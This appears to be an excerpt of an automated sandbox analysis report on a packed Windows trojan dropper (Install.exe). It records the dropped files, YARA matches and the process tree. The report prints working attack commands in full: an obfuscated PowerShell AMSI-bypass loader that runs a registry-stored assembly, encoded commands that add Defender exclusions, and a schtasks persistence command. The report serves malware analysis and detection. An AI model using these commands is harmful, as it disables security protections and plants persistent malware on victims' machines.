Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0CED8	47_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF11660	49_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF1C4E4	49_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF22418	49_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF10800	49_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF20400	49_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF1C2D8	49_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF41400	49_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF42260	49_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4D0E4	49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF53018	49_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF51000	49_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4CED8	49_2_000001B8BFF4CED8

PE file contains strange resources

Source: Install.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Uses 32bit PE files

Source: Install.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPED	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPED	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25

Deletes files inside the Windows folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Install.exe

Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_0040352D

Creates files inside the system directory

Source: C:\Windows\System32\nslookup.exe

File created: C:\Windows\Tasks\nslooksvc32.job

Contains functionality to call native functions

Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle,	39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle,	39_2_0000000140001430
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey,	42_2_000001AFDDD03120

PE file does not import any functions

Source: chrome.exe.4.dr	Static PE information: No import functions for PE file found
Source: 34432.exe.1.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: Install.exe, 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilename34432.exe< vs Install.exe

Source: Install.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Install.exe

File created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@44/26@1/1

Source: C:\Users\user\Desktop\Install.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Windows\System32\nslookup.exe

Code function: 22_2_0000000140001000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,

22_2_0000000140001000

Source: Install.exe	Virustotal: Detection: 41%
Source: Install.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\Install.exe

File read: C:\Users\user\Desktop\Install.exe

Jump to behavior

Source: C:\Users\user\Desktop\Install.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe"
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Jump to behavior
Source: C:\Users\user\Desktop\Install.exe	Process created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
